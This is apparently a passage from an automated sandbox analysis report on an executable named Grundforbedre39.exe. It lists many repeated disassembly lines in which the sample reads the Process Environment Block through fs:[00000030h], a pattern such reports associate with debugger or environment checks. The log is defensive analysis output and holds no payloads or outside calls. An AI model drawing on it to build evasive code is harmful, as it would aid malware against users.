        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355137E4 mov eax, dword ptr fs:[00000030h]4_2_355137E4
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355137E4 mov eax, dword ptr fs:[00000030h]4_2_355137E4
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355137E4 mov eax, dword ptr fs:[00000030h]4_2_355137E4
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355137E4 mov eax, dword ptr fs:[00000030h]4_2_355137E4
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355137E4 mov eax, dword ptr fs:[00000030h]4_2_355137E4
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355137E4 mov eax, dword ptr fs:[00000030h]4_2_355137E4
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355137E4 mov eax, dword ptr fs:[00000030h]4_2_355137E4
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35541796 mov eax, dword ptr fs:[00000030h]4_2_35541796
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35541796 mov eax, dword ptr fs:[00000030h]4_2_35541796
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E79D mov eax, dword ptr fs:[00000030h]4_2_3558E79D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E79D mov eax, dword ptr fs:[00000030h]4_2_3558E79D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E79D mov eax, dword ptr fs:[00000030h]4_2_3558E79D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E79D mov eax, dword ptr fs:[00000030h]4_2_3558E79D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E79D mov eax, dword ptr fs:[00000030h]4_2_3558E79D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E79D mov eax, dword ptr fs:[00000030h]4_2_3558E79D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E79D mov eax, dword ptr fs:[00000030h]4_2_3558E79D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E79D mov eax, dword ptr fs:[00000030h]4_2_3558E79D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E79D mov eax, dword ptr fs:[00000030h]4_2_3558E79D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355EB781 mov eax, dword ptr fs:[00000030h]4_2_355EB781
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355EB781 mov eax, dword ptr fs:[00000030h]4_2_355EB781
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E17BC mov eax, dword ptr fs:[00000030h]4_2_355E17BC
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355107A7 mov eax, dword ptr fs:[00000030h]4_2_355107A7
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355DD7A7 mov eax, dword ptr fs:[00000030h]4_2_355DD7A7
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355DD7A7 mov eax, dword ptr fs:[00000030h]4_2_355DD7A7
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355DD7A7 mov eax, dword ptr fs:[00000030h]4_2_355DD7A7
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35545654 mov eax, dword ptr fs:[00000030h]4_2_35545654
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554265C mov eax, dword ptr fs:[00000030h]4_2_3554265C
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554265C mov ecx, dword ptr fs:[00000030h]4_2_3554265C
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554265C mov eax, dword ptr fs:[00000030h]4_2_3554265C
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35513640 mov eax, dword ptr fs:[00000030h]4_2_35513640
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552F640 mov eax, dword ptr fs:[00000030h]4_2_3552F640
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552F640 mov eax, dword ptr fs:[00000030h]4_2_3552F640
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552F640 mov eax, dword ptr fs:[00000030h]4_2_3552F640
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554C640 mov eax, dword ptr fs:[00000030h]4_2_3554C640
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554C640 mov eax, dword ptr fs:[00000030h]4_2_3554C640
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550D64A mov eax, dword ptr fs:[00000030h]4_2_3550D64A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550D64A mov eax, dword ptr fs:[00000030h]4_2_3550D64A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35510670 mov eax, dword ptr fs:[00000030h]4_2_35510670
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552670 mov eax, dword ptr fs:[00000030h]4_2_35552670
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552670 mov eax, dword ptr fs:[00000030h]4_2_35552670
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35523660 mov eax, dword ptr fs:[00000030h]4_2_35523660
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35523660 mov eax, dword ptr fs:[00000030h]4_2_35523660
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35523660 mov eax, dword ptr fs:[00000030h]4_2_35523660
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35507662 mov eax, dword ptr fs:[00000030h]4_2_35507662
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35507662 mov eax, dword ptr fs:[00000030h]4_2_35507662
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35507662 mov eax, dword ptr fs:[00000030h]4_2_35507662
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554666D mov esi, dword ptr fs:[00000030h]4_2_3554666D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554666D mov eax, dword ptr fs:[00000030h]4_2_3554666D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554666D mov eax, dword ptr fs:[00000030h]4_2_3554666D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355A3608 mov eax, dword ptr fs:[00000030h]4_2_355A3608
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355A3608 mov eax, dword ptr fs:[00000030h]4_2_355A3608
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355A3608 mov eax, dword ptr fs:[00000030h]4_2_355A3608
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355A3608 mov eax, dword ptr fs:[00000030h]4_2_355A3608
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355A3608 mov eax, dword ptr fs:[00000030h]4_2_355A3608
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355A3608 mov eax, dword ptr fs:[00000030h]4_2_355A3608
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553D600 mov eax, dword ptr fs:[00000030h]4_2_3553D600
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553D600 mov eax, dword ptr fs:[00000030h]4_2_3553D600
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CF607 mov eax, dword ptr fs:[00000030h]4_2_355CF607
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554360F mov eax, dword ptr fs:[00000030h]4_2_3554360F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E4600 mov eax, dword ptr fs:[00000030h]4_2_355E4600
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35510630 mov eax, dword ptr fs:[00000030h]4_2_35510630
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35540630 mov eax, dword ptr fs:[00000030h]4_2_35540630
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35598633 mov esi, dword ptr fs:[00000030h]4_2_35598633
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35598633 mov eax, dword ptr fs:[00000030h]4_2_35598633
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35598633 mov eax, dword ptr fs:[00000030h]4_2_35598633
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35517623 mov eax, dword ptr fs:[00000030h]4_2_35517623
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35515622 mov eax, dword ptr fs:[00000030h]4_2_35515622
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35515622 mov eax, dword ptr fs:[00000030h]4_2_35515622
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554C620 mov eax, dword ptr fs:[00000030h]4_2_3554C620
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553D6D0 mov eax, dword ptr fs:[00000030h]4_2_3553D6D0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355106CF mov eax, dword ptr fs:[00000030h]4_2_355106CF
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558C6F2 mov eax, dword ptr fs:[00000030h]4_2_3558C6F2
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558C6F2 mov eax, dword ptr fs:[00000030h]4_2_3558C6F2
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355096E0 mov eax, dword ptr fs:[00000030h]4_2_355096E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355096E0 mov eax, dword ptr fs:[00000030h]4_2_355096E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551C6E0 mov eax, dword ptr fs:[00000030h]4_2_3551C6E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355156E0 mov eax, dword ptr fs:[00000030h]4_2_355156E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355156E0 mov eax, dword ptr fs:[00000030h]4_2_355156E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355156E0 mov eax, dword ptr fs:[00000030h]4_2_355156E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355366E0 mov eax, dword ptr fs:[00000030h]4_2_355366E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355366E0 mov eax, dword ptr fs:[00000030h]4_2_355366E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35518690 mov eax, dword ptr fs:[00000030h]4_2_35518690
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558D69D mov eax, dword ptr fs:[00000030h]4_2_3558D69D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CF68C mov eax, dword ptr fs:[00000030h]4_2_355CF68C
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520680 mov eax, dword ptr fs:[00000030h]4_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520680 mov eax, dword ptr fs:[00000030h]4_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520680 mov eax, dword ptr fs:[00000030h]4_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520680 mov eax, dword ptr fs:[00000030h]4_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520680 mov eax, dword ptr fs:[00000030h]4_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520680 mov eax, dword ptr fs:[00000030h]4_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520680 mov eax, dword ptr fs:[00000030h]4_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520680 mov eax, dword ptr fs:[00000030h]4_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520680 mov eax, dword ptr fs:[00000030h]4_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520680 mov eax, dword ptr fs:[00000030h]4_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520680 mov eax, dword ptr fs:[00000030h]4_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520680 mov eax, dword ptr fs:[00000030h]4_2_35520680
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355D86A8 mov eax, dword ptr fs:[00000030h]4_2_355D86A8
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355D86A8 mov eax, dword ptr fs:[00000030h]4_2_355D86A8
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E3157 mov eax, dword ptr fs:[00000030h]4_2_355E3157
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E3157 mov eax, dword ptr fs:[00000030h]4_2_355E3157
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E3157 mov eax, dword ptr fs:[00000030h]4_2_355E3157
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554415F mov eax, dword ptr fs:[00000030h]4_2_3554415F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355A314A mov eax, dword ptr fs:[00000030h]4_2_355A314A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355A314A mov eax, dword ptr fs:[00000030h]4_2_355A314A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355A314A mov eax, dword ptr fs:[00000030h]4_2_355A314A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355A314A mov eax, dword ptr fs:[00000030h]4_2_355A314A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E5149 mov eax, dword ptr fs:[00000030h]4_2_355E5149
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550A147 mov eax, dword ptr fs:[00000030h]4_2_3550A147
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550A147 mov eax, dword ptr fs:[00000030h]4_2_3550A147
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550A147 mov eax, dword ptr fs:[00000030h]4_2_3550A147
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35516179 mov eax, dword ptr fs:[00000030h]4_2_35516179
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554716D mov eax, dword ptr fs:[00000030h]4_2_3554716D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F113 mov eax, dword ptr fs:[00000030h]4_2_3550F113
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35540118 mov eax, dword ptr fs:[00000030h]4_2_35540118
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553510F mov eax, dword ptr fs:[00000030h]4_2_3553510F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553510F mov eax, dword ptr fs:[00000030h]4_2_3553510F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553510F mov eax, dword ptr fs:[00000030h]4_2_3553510F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553510F mov eax, dword ptr fs:[00000030h]4_2_3553510F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553510F mov eax, dword ptr fs:[00000030h]4_2_3553510F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553510F mov eax, dword ptr fs:[00000030h]4_2_3553510F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553510F mov eax, dword ptr fs:[00000030h]4_2_3553510F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553510F mov eax, dword ptr fs:[00000030h]4_2_3553510F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553510F mov eax, dword ptr fs:[00000030h]4_2_3553510F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553510F mov eax, dword ptr fs:[00000030h]4_2_3553510F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553510F mov eax, dword ptr fs:[00000030h]4_2_3553510F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553510F mov eax, dword ptr fs:[00000030h]4_2_3553510F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553510F mov eax, dword ptr fs:[00000030h]4_2_3553510F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551510D mov eax, dword ptr fs:[00000030h]4_2_3551510D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CF13E mov eax, dword ptr fs:[00000030h]4_2_355CF13E
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559A130 mov eax, dword ptr fs:[00000030h]4_2_3559A130
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35547128 mov eax, dword ptr fs:[00000030h]4_2_35547128
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35547128 mov eax, dword ptr fs:[00000030h]4_2_35547128
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355201C0 mov eax, dword ptr fs:[00000030h]4_2_355201C0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355201C0 mov eax, dword ptr fs:[00000030h]4_2_355201C0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355251C0 mov eax, dword ptr fs:[00000030h]4_2_355251C0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355251C0 mov eax, dword ptr fs:[00000030h]4_2_355251C0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355251C0 mov eax, dword ptr fs:[00000030h]4_2_355251C0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355251C0 mov eax, dword ptr fs:[00000030h]4_2_355251C0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355091F0 mov eax, dword ptr fs:[00000030h]4_2_355091F0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355091F0 mov eax, dword ptr fs:[00000030h]4_2_355091F0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355201F1 mov eax, dword ptr fs:[00000030h]4_2_355201F1
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355201F1 mov eax, dword ptr fs:[00000030h]4_2_355201F1
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355201F1 mov eax, dword ptr fs:[00000030h]4_2_355201F1
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553F1F0 mov eax, dword ptr fs:[00000030h]4_2_3553F1F0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553F1F0 mov eax, dword ptr fs:[00000030h]4_2_3553F1F0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551A1E3 mov eax, dword ptr fs:[00000030h]4_2_3551A1E3
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551A1E3 mov eax, dword ptr fs:[00000030h]4_2_3551A1E3
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551A1E3 mov eax, dword ptr fs:[00000030h]4_2_3551A1E3
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551A1E3 mov eax, dword ptr fs:[00000030h]4_2_3551A1E3
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551A1E3 mov eax, dword ptr fs:[00000030h]4_2_3551A1E3
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553B1E0 mov eax, dword ptr fs:[00000030h]4_2_3553B1E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553B1E0 mov eax, dword ptr fs:[00000030h]4_2_3553B1E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553B1E0 mov eax, dword ptr fs:[00000030h]4_2_3553B1E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553B1E0 mov eax, dword ptr fs:[00000030h]4_2_3553B1E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553B1E0 mov eax, dword ptr fs:[00000030h]4_2_3553B1E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553B1E0 mov eax, dword ptr fs:[00000030h]4_2_3553B1E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553B1E0 mov eax, dword ptr fs:[00000030h]4_2_3553B1E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355D81EE mov eax, dword ptr fs:[00000030h]4_2_355D81EE
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355D81EE mov eax, dword ptr fs:[00000030h]4_2_355D81EE
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355191E5 mov eax, dword ptr fs:[00000030h]4_2_355191E5
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355191E5 mov eax, dword ptr fs:[00000030h]4_2_355191E5
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355081EB mov eax, dword ptr fs:[00000030h]4_2_355081EB
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35551190 mov eax, dword ptr fs:[00000030h]4_2_35551190
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35551190 mov eax, dword ptr fs:[00000030h]4_2_35551190
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35539194 mov eax, dword ptr fs:[00000030h]4_2_35539194
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35514180 mov eax, dword ptr fs:[00000030h]4_2_35514180
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35514180 mov eax, dword ptr fs:[00000030h]4_2_35514180
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35514180 mov eax, dword ptr fs:[00000030h]4_2_35514180
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E51B6 mov eax, dword ptr fs:[00000030h]4_2_355E51B6
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355431BE mov eax, dword ptr fs:[00000030h]4_2_355431BE
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355431BE mov eax, dword ptr fs:[00000030h]4_2_355431BE
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355441BB mov ecx, dword ptr fs:[00000030h]4_2_355441BB
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355441BB mov eax, dword ptr fs:[00000030h]4_2_355441BB
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355441BB mov eax, dword ptr fs:[00000030h]4_2_355441BB
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554E1A4 mov eax, dword ptr fs:[00000030h]4_2_3554E1A4
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554E1A4 mov eax, dword ptr fs:[00000030h]4_2_3554E1A4
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35511051 mov eax, dword ptr fs:[00000030h]4_2_35511051
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35511051 mov eax, dword ptr fs:[00000030h]4_2_35511051
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E505B mov eax, dword ptr fs:[00000030h]4_2_355E505B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35540044 mov eax, dword ptr fs:[00000030h]4_2_35540044
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35517072 mov eax, dword ptr fs:[00000030h]4_2_35517072
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35516074 mov eax, dword ptr fs:[00000030h]4_2_35516074
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35516074 mov eax, dword ptr fs:[00000030h]4_2_35516074
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35535004 mov eax, dword ptr fs:[00000030h]4_2_35535004
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35535004 mov ecx, dword ptr fs:[00000030h]4_2_35535004
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35518009 mov eax, dword ptr fs:[00000030h]4_2_35518009
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550D02D mov eax, dword ptr fs:[00000030h]4_2_3550D02D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552B0D0 mov eax, dword ptr fs:[00000030h]4_2_3552B0D0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550B0D6 mov eax, dword ptr fs:[00000030h]4_2_3550B0D6
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550B0D6 mov eax, dword ptr fs:[00000030h]4_2_3550B0D6
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550B0D6 mov eax, dword ptr fs:[00000030h]4_2_3550B0D6
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550B0D6 mov eax, dword ptr fs:[00000030h]4_2_3550B0D6
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554D0F0 mov eax, dword ptr fs:[00000030h]4_2_3554D0F0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554D0F0 mov ecx, dword ptr fs:[00000030h]4_2_3554D0F0
